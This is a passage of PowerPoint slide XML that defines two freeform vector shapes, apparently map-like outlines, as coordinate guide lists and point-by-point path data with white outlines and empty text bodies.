                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36455" name="Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2688" y="2766"/>
                <a:ext cx="70" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 70"/>
                  <a:gd name="T1" fmla="*/ 25 h 103"/>
                  <a:gd name="T2" fmla="*/ 7 w 70"/>
                  <a:gd name="T3" fmla="*/ 24 h 103"/>
                  <a:gd name="T4" fmla="*/ 7 w 70"/>
                  <a:gd name="T5" fmla="*/ 21 h 103"/>
                  <a:gd name="T6" fmla="*/ 5 w 70"/>
                  <a:gd name="T7" fmla="*/ 7 h 103"/>
                  <a:gd name="T8" fmla="*/ 6 w 70"/>
                  <a:gd name="T9" fmla="*/ 5 h 103"/>
                  <a:gd name="T10" fmla="*/ 8 w 70"/>
                  <a:gd name="T11" fmla="*/ 3 h 103"/>
                  <a:gd name="T12" fmla="*/ 23 w 70"/>
                  <a:gd name="T13" fmla="*/ 3 h 103"/>
                  <a:gd name="T14" fmla="*/ 29 w 70"/>
                  <a:gd name="T15" fmla="*/ 3 h 103"/>
                  <a:gd name="T16" fmla="*/ 40 w 70"/>
                  <a:gd name="T17" fmla="*/ 3 h 103"/>
                  <a:gd name="T18" fmla="*/ 47 w 70"/>
                  <a:gd name="T19" fmla="*/ 0 h 103"/>
                  <a:gd name="T20" fmla="*/ 48 w 70"/>
                  <a:gd name="T21" fmla="*/ 0 h 103"/>
                  <a:gd name="T22" fmla="*/ 52 w 70"/>
                  <a:gd name="T23" fmla="*/ 1 h 103"/>
                  <a:gd name="T24" fmla="*/ 50 w 70"/>
                  <a:gd name="T25" fmla="*/ 7 h 103"/>
                  <a:gd name="T26" fmla="*/ 50 w 70"/>
                  <a:gd name="T27" fmla="*/ 9 h 103"/>
                  <a:gd name="T28" fmla="*/ 55 w 70"/>
                  <a:gd name="T29" fmla="*/ 16 h 103"/>
                  <a:gd name="T30" fmla="*/ 57 w 70"/>
                  <a:gd name="T31" fmla="*/ 19 h 103"/>
                  <a:gd name="T32" fmla="*/ 56 w 70"/>
                  <a:gd name="T33" fmla="*/ 24 h 103"/>
                  <a:gd name="T34" fmla="*/ 56 w 70"/>
                  <a:gd name="T35" fmla="*/ 27 h 103"/>
                  <a:gd name="T36" fmla="*/ 58 w 70"/>
                  <a:gd name="T37" fmla="*/ 35 h 103"/>
                  <a:gd name="T38" fmla="*/ 59 w 70"/>
                  <a:gd name="T39" fmla="*/ 40 h 103"/>
                  <a:gd name="T40" fmla="*/ 63 w 70"/>
                  <a:gd name="T41" fmla="*/ 45 h 103"/>
                  <a:gd name="T42" fmla="*/ 63 w 70"/>
                  <a:gd name="T43" fmla="*/ 46 h 103"/>
                  <a:gd name="T44" fmla="*/ 61 w 70"/>
                  <a:gd name="T45" fmla="*/ 48 h 103"/>
                  <a:gd name="T46" fmla="*/ 60 w 70"/>
                  <a:gd name="T47" fmla="*/ 51 h 103"/>
                  <a:gd name="T48" fmla="*/ 60 w 70"/>
                  <a:gd name="T49" fmla="*/ 60 h 103"/>
                  <a:gd name="T50" fmla="*/ 60 w 70"/>
                  <a:gd name="T51" fmla="*/ 65 h 103"/>
                  <a:gd name="T52" fmla="*/ 60 w 70"/>
                  <a:gd name="T53" fmla="*/ 69 h 103"/>
                  <a:gd name="T54" fmla="*/ 61 w 70"/>
                  <a:gd name="T55" fmla="*/ 73 h 103"/>
                  <a:gd name="T56" fmla="*/ 64 w 70"/>
                  <a:gd name="T57" fmla="*/ 77 h 103"/>
                  <a:gd name="T58" fmla="*/ 70 w 70"/>
                  <a:gd name="T59" fmla="*/ 81 h 103"/>
                  <a:gd name="T60" fmla="*/ 66 w 70"/>
                  <a:gd name="T61" fmla="*/ 86 h 103"/>
                  <a:gd name="T62" fmla="*/ 64 w 70"/>
                  <a:gd name="T63" fmla="*/ 87 h 103"/>
                  <a:gd name="T64" fmla="*/ 60 w 70"/>
                  <a:gd name="T65" fmla="*/ 87 h 103"/>
                  <a:gd name="T66" fmla="*/ 52 w 70"/>
                  <a:gd name="T67" fmla="*/ 88 h 103"/>
                  <a:gd name="T68" fmla="*/ 49 w 70"/>
                  <a:gd name="T69" fmla="*/ 89 h 103"/>
                  <a:gd name="T70" fmla="*/ 48 w 70"/>
                  <a:gd name="T71" fmla="*/ 90 h 103"/>
                  <a:gd name="T72" fmla="*/ 41 w 70"/>
                  <a:gd name="T73" fmla="*/ 93 h 103"/>
                  <a:gd name="T74" fmla="*/ 32 w 70"/>
                  <a:gd name="T75" fmla="*/ 96 h 103"/>
                  <a:gd name="T76" fmla="*/ 26 w 70"/>
                  <a:gd name="T77" fmla="*/ 99 h 103"/>
                  <a:gd name="T78" fmla="*/ 19 w 70"/>
                  <a:gd name="T79" fmla="*/ 103 h 103"/>
                  <a:gd name="T80" fmla="*/ 15 w 70"/>
                  <a:gd name="T81" fmla="*/ 101 h 103"/>
                  <a:gd name="T82" fmla="*/ 8 w 70"/>
                  <a:gd name="T83" fmla="*/ 98 h 103"/>
                  <a:gd name="T84" fmla="*/ 7 w 70"/>
                  <a:gd name="T85" fmla="*/ 97 h 103"/>
                  <a:gd name="T86" fmla="*/ 7 w 70"/>
                  <a:gd name="T87" fmla="*/ 91 h 103"/>
                  <a:gd name="T88" fmla="*/ 3 w 70"/>
                  <a:gd name="T89" fmla="*/ 83 h 103"/>
                  <a:gd name="T90" fmla="*/ 1 w 70"/>
                  <a:gd name="T91" fmla="*/ 78 h 103"/>
                  <a:gd name="T92" fmla="*/ 0 w 70"/>
                  <a:gd name="T93" fmla="*/ 73 h 103"/>
                  <a:gd name="T94" fmla="*/ 3 w 70"/>
                  <a:gd name="T95" fmla="*/ 66 h 103"/>
                  <a:gd name="T96" fmla="*/ 6 w 70"/>
                  <a:gd name="T97" fmla="*/ 56 h 103"/>
                  <a:gd name="T98" fmla="*/ 9 w 70"/>
                  <a:gd name="T99" fmla="*/ 50 h 103"/>
                  <a:gd name="T100" fmla="*/ 11 w 70"/>
                  <a:gd name="T101" fmla="*/ 46 h 103"/>
                  <a:gd name="T102" fmla="*/ 9 w 70"/>
                  <a:gd name="T103" fmla="*/ 36 h 103"/>
                  <a:gd name="T104" fmla="*/ 7 w 70"/>
                  <a:gd name="T105" fmla="*/ 26 h 103"/>
                  <a:gd name="T106" fmla="*/ 6 w 70"/>
                  <a:gd name="T107" fmla="*/ 25 h 103"/>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70"/>
                  <a:gd name="T163" fmla="*/ 0 h 103"/>
                  <a:gd name="T164" fmla="*/ 70 w 70"/>
                  <a:gd name="T165" fmla="*/ 103 h 103"/>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70" h="103">
                    <a:moveTo>
                      <a:pt x="6" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36456" name="Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2888" y="2387"/>
                <a:ext cx="249" cy="242"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 247 w 249"/>
                  <a:gd name="T1" fmla="*/ 209 h 242"/>
                  <a:gd name="T2" fmla="*/ 246 w 249"/>
                  <a:gd name="T3" fmla="*/ 234 h 242"/>
                  <a:gd name="T4" fmla="*/ 232 w 249"/>
                  <a:gd name="T5" fmla="*/ 234 h 242"/>
                  <a:gd name="T6" fmla="*/ 217 w 249"/>
                  <a:gd name="T7" fmla="*/ 235 h 242"/>
                  <a:gd name="T8" fmla="*/ 142 w 249"/>
                  <a:gd name="T9" fmla="*/ 195 h 242"/>
                  <a:gd name="T10" fmla="*/ 102 w 249"/>
                  <a:gd name="T11" fmla="*/ 176 h 242"/>
                  <a:gd name="T12" fmla="*/ 78 w 249"/>
                  <a:gd name="T13" fmla="*/ 188 h 242"/>
                  <a:gd name="T14" fmla="*/ 68 w 249"/>
                  <a:gd name="T15" fmla="*/ 182 h 242"/>
                  <a:gd name="T16" fmla="*/ 59 w 249"/>
                  <a:gd name="T17" fmla="*/ 179 h 242"/>
                  <a:gd name="T18" fmla="*/ 41 w 249"/>
                  <a:gd name="T19" fmla="*/ 174 h 242"/>
                  <a:gd name="T20" fmla="*/ 34 w 249"/>
                  <a:gd name="T21" fmla="*/ 162 h 242"/>
                  <a:gd name="T22" fmla="*/ 26 w 249"/>
                  <a:gd name="T23" fmla="*/ 158 h 242"/>
                  <a:gd name="T24" fmla="*/ 16 w 249"/>
                  <a:gd name="T25" fmla="*/ 158 h 242"/>
                  <a:gd name="T26" fmla="*/ 11 w 249"/>
                  <a:gd name="T27" fmla="*/ 150 h 242"/>
                  <a:gd name="T28" fmla="*/ 0 w 249"/>
                  <a:gd name="T29" fmla="*/ 129 h 242"/>
                  <a:gd name="T30" fmla="*/ 3 w 249"/>
                  <a:gd name="T31" fmla="*/ 126 h 242"/>
                  <a:gd name="T32" fmla="*/ 8 w 249"/>
                  <a:gd name="T33" fmla="*/ 121 h 242"/>
                  <a:gd name="T34" fmla="*/ 5 w 249"/>
                  <a:gd name="T35" fmla="*/ 106 h 242"/>
                  <a:gd name="T36" fmla="*/ 7 w 249"/>
                  <a:gd name="T37" fmla="*/ 97 h 242"/>
                  <a:gd name="T38" fmla="*/ 7 w 249"/>
                  <a:gd name="T39" fmla="*/ 84 h 242"/>
                  <a:gd name="T40" fmla="*/ 6 w 249"/>
                  <a:gd name="T41" fmla="*/ 72 h 242"/>
                  <a:gd name="T42" fmla="*/ 1 w 249"/>
                  <a:gd name="T43" fmla="*/ 56 h 242"/>
                  <a:gd name="T44" fmla="*/ 4 w 249"/>
                  <a:gd name="T45" fmla="*/ 53 h 242"/>
                  <a:gd name="T46" fmla="*/ 12 w 249"/>
                  <a:gd name="T47" fmla="*/ 46 h 242"/>
                  <a:gd name="T48" fmla="*/ 11 w 249"/>
                  <a:gd name="T49" fmla="*/ 34 h 242"/>
                  <a:gd name="T50" fmla="*/ 22 w 249"/>
                  <a:gd name="T51" fmla="*/ 21 h 242"/>
                  <a:gd name="T52" fmla="*/ 32 w 249"/>
                  <a:gd name="T53" fmla="*/ 15 h 242"/>
                  <a:gd name="T54" fmla="*/ 33 w 249"/>
                  <a:gd name="T55" fmla="*/ 8 h 242"/>
                  <a:gd name="T56" fmla="*/ 43 w 249"/>
                  <a:gd name="T57" fmla="*/ 5 h 242"/>
                  <a:gd name="T58" fmla="*/ 54 w 249"/>
                  <a:gd name="T59" fmla="*/ 7 h 242"/>
                  <a:gd name="T60" fmla="*/ 65 w 249"/>
                  <a:gd name="T61" fmla="*/ 7 h 242"/>
                  <a:gd name="T62" fmla="*/ 80 w 249"/>
                  <a:gd name="T63" fmla="*/ 12 h 242"/>
                  <a:gd name="T64" fmla="*/ 89 w 249"/>
                  <a:gd name="T65" fmla="*/ 14 h 242"/>
                  <a:gd name="T66" fmla="*/ 93 w 249"/>
                  <a:gd name="T67" fmla="*/ 18 h 242"/>
                  <a:gd name="T68" fmla="*/ 98 w 249"/>
                  <a:gd name="T69" fmla="*/ 30 h 242"/>
                  <a:gd name="T70" fmla="*/ 105 w 249"/>
                  <a:gd name="T71" fmla="*/ 36 h 242"/>
                  <a:gd name="T72" fmla="*/ 117 w 249"/>
                  <a:gd name="T73" fmla="*/ 37 h 242"/>
                  <a:gd name="T74" fmla="*/ 127 w 249"/>
                  <a:gd name="T75" fmla="*/ 40 h 242"/>
                  <a:gd name="T76" fmla="*/ 136 w 249"/>
                  <a:gd name="T77" fmla="*/ 44 h 242"/>
                  <a:gd name="T78" fmla="*/ 151 w 249"/>
                  <a:gd name="T79" fmla="*/ 54 h 242"/>
                  <a:gd name="T80" fmla="*/ 158 w 249"/>
                  <a:gd name="T81" fmla="*/ 53 h 242"/>
                  <a:gd name="T82" fmla="*/ 168 w 249"/>
                  <a:gd name="T83" fmla="*/ 45 h 242"/>
                  <a:gd name="T84" fmla="*/ 170 w 249"/>
                  <a:gd name="T85" fmla="*/ 38 h 242"/>
                  <a:gd name="T86" fmla="*/ 167 w 249"/>
                  <a:gd name="T87" fmla="*/ 28 h 242"/>
                  <a:gd name="T88" fmla="*/ 169 w 249"/>
                  <a:gd name="T89" fmla="*/ 20 h 242"/>
                  <a:gd name="T90" fmla="*/ 176 w 249"/>
                  <a:gd name="T91" fmla="*/ 14 h 242"/>
                  <a:gd name="T92" fmla="*/ 185 w 249"/>
                  <a:gd name="T93" fmla="*/ 9 h 242"/>
                  <a:gd name="T94" fmla="*/ 204 w 249"/>
                  <a:gd name="T95" fmla="*/ 6 h 242"/>
                  <a:gd name="T96" fmla="*/ 215 w 249"/>
                  <a:gd name="T97" fmla="*/ 11 h 242"/>
                  <a:gd name="T98" fmla="*/ 217 w 249"/>
                  <a:gd name="T99" fmla="*/ 16 h 242"/>
                  <a:gd name="T100" fmla="*/ 221 w 249"/>
                  <a:gd name="T101" fmla="*/ 19 h 242"/>
                  <a:gd name="T102" fmla="*/ 232 w 249"/>
                  <a:gd name="T103" fmla="*/ 22 h 242"/>
                  <a:gd name="T104" fmla="*/ 245 w 249"/>
                  <a:gd name="T105" fmla="*/ 23 h 242"/>
                  <a:gd name="T106" fmla="*/ 247 w 249"/>
                  <a:gd name="T107" fmla="*/ 28 h 242"/>
                  <a:gd name="T108" fmla="*/ 249 w 249"/>
                  <a:gd name="T109" fmla="*/ 32 h 242"/>
                  <a:gd name="T110" fmla="*/ 245 w 249"/>
                  <a:gd name="T111" fmla="*/ 37 h 242"/>
                  <a:gd name="T112" fmla="*/ 246 w 249"/>
                  <a:gd name="T113" fmla="*/ 51 h 242"/>
                  <a:gd name="T114" fmla="*/ 243 w 249"/>
                  <a:gd name="T115" fmla="*/ 58 h 242"/>
                  <a:gd name="T116" fmla="*/ 247 w 249"/>
                  <a:gd name="T117" fmla="*/ 73 h 242"/>
                  <a:gd name="T118" fmla="*/ 247 w 249"/>
                  <a:gd name="T119" fmla="*/ 84 h 242"/>
                  <a:gd name="T120" fmla="*/ 247 w 249"/>
                  <a:gd name="T121" fmla="*/ 127 h 242"/>
                  <a:gd name="T122" fmla="*/ 247 w 249"/>
                  <a:gd name="T123" fmla="*/ 149 h 242"/>
                  <a:gd name="T124" fmla="*/ 247 w 249"/>
                  <a:gd name="T125" fmla="*/ 181 h 24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249"/>
                  <a:gd name="T190" fmla="*/ 0 h 242"/>
                  <a:gd name="T191" fmla="*/ 249 w 249"/>
                  <a:gd name="T192" fmla="*/ 242 h 24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249" h="242">
                    <a:moveTo>
                      <a:pt x="247" y="201"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="247" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="201"/>
